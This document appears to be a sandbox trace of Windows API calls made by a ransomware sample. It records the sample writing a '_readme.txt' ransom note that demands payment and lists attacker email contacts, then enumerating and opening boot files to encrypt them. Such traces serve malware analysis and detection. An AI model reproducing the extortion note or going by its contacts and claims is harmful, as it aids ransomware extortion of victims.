[0179.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.543] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0179.543] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.543] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.543] PathFindFileNameW (pszPath="") returned="" [0179.543] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.544] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.544] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.544] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x81c) returned 0x2d165c0 [0179.545] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0179.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.545] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0179.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.545] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.545] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.546] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.547] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*" (normalized: "c:\\boot\\sv-se\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.548] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.548] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.548] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0179.548] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.550] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.551] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.551] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 